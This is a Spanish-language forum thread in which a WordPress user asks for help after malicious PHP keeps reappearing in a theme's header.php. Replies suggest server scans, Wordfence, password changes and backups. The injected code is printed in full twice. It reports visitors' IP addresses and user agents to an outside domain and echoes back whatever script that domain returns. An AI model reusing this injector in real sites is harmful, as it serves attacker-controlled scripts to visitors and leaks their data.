Problema de código malicioso en Wordpress

  • Autor Autor oscarva
  • Fecha de inicio Fecha de inicio
oscarva

oscarva

Lambda
Hola compañeros buenas noches.

Desde hace un tiempo vengo notando que están insertando código seguramente malicioso en mi wordpress, hace unos 20 días borre dicho código, actualice todos los plugins, elimine todo lo innecesario incluyendo themes que no uso y demás. Pero hoy nuevamente me apareció en código.

El código lo insertan en el header.php del tema, justo después del <body> y el código inyectado es el siguiente:

Insertar CODE, HTML o PHP: 
<?php
#8d54b6#
error_reporting(0); ini_set('display_errors',0); $wp_ko2 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_ko2) && !preg_match ('/bot/i', $wp_ko2))){
$wp_ko092="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ko2);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_ko092);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_2ko = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_2ko,1,3) === 'scr' ){ echo $wp_2ko; }
echo $wp_2ko;
#/8d54b6#
?>

Por más que busque por todo lado, no encontré ayuda ni nada parecido en google, una pista es que en otro sitio donde uso el mismo theme también estaba el mismo código insertado, así que esto me puede indicar que se trata de un problema con el theme.

a alguien le ha pasado? alguna ayuda?

Un saludo.
 
oscarva dijo:
Hola compañeros buenas noches.

Desde hace un tiempo vengo notando que están insertando código seguramente malicioso en mi wordpress, hace unos 20 días borre dicho código, actualice todos los plugins, elimine todo lo innecesario incluyendo themes que no uso y demás. Pero hoy nuevamente me apareció en código.

El código lo insertan en el header.php del tema, justo después del <body> y el código inyectado es el siguiente:

Insertar CODE, HTML o PHP: 
<?php
#8d54b6#
error_reporting(0); ini_set('display_errors',0); $wp_ko2 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_ko2) && !preg_match ('/bot/i', $wp_ko2))){
$wp_ko092="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ko2);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_ko092);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_2ko = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_2ko,1,3) === 'scr' ){ echo $wp_2ko; }
echo $wp_2ko;
#/8d54b6#
?>

Por más que busque por todo lado, no encontré ayuda ni nada parecido en google, una pista es que en otro sitio donde uso el mismo theme también estaba el mismo código insertado, así que esto me puede indicar que se trata de un problema con el theme.

a alguien le ha pasado? alguna ayuda?

Un saludo.
Hacer clic para expandir...

Una ves con acceso a tu server, peuden acceder a todos tus sitios... si vas al editor de themes de WP y editas el header.php ves ese code? sino lo ves es porque se metio en functions.php o en algun otro file para hacer la inyección... podrias colocar wordfence y que te avise si tus archivos son modificados.
 
cicklow dijo:
Una ves con acceso a tu server, peuden acceder a todos tus sitios... si vas al editor de themes de WP y editas el header.php ves ese code? sino lo ves es porque se metio en functions.php o en algun otro file para hacer la inyección... podrias colocar wordfence y que te avise si tus archivos son modificados.
Hacer clic para expandir...


Gracias compañero, justamente el que me aviso fue el wordfence... el codigo si esta insertado directamente en el header.php
 
oscarva dijo:
Gracias compañero, justamente el que me aviso fue el wordfence... el codigo si esta insertado directamente en el header.php
Hacer clic para expandir...

Entonces tendras que escanear tu server...contacta con soporte para que hagan un scan (o si tienes un VPS o Dedicado puedes hacerlo tu desde cpanel).
 
Eso pasa la mayoría de veces por themes nulled, pero creo que no es tu caso.

Da miedo con estos hackers :$

No se hasta dónde puede llegar a perjudicar un hacker, pero te recomendaría tener backups de las bases de datos por si las llegaras a necesitar.
 
No lo mencionas pero debes cambiar la contraseña del panel de control y del ftp o seguiran entrando.

En mi caso bajo los archivos luego con dreamweaver o herramienta similar abro todos y le doy buscar en documentos abiertos y pongo fragmentos del spam o virus con eso ya ves bien que no tenga ningun archivo
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

spitfire
Prevención de código malicioso en Base de Datos de usuario
Respuestas
19
Visitas
580
spitfire
spitfire
BigSeoData
  • Pregunta Pregunta
Cómo eliminar código malicioso de Search Console
Respuestas
9
Visitas
415
BigSeoData
BigSeoData
R
Plugin para detectar código malicioso en Wordpress
Respuestas
1
Visitas
238
rjga0103
R
R
Alternativa a Wordfence para buscar código malicioso en WordPress
Respuestas
1
Visitas
289
Carlos Arreola
C
jcfernandez
Revisar THEME si tiene algún código malicioso
Respuestas
7
Visitas
513
migueldesafio
M
Atrás
Arriba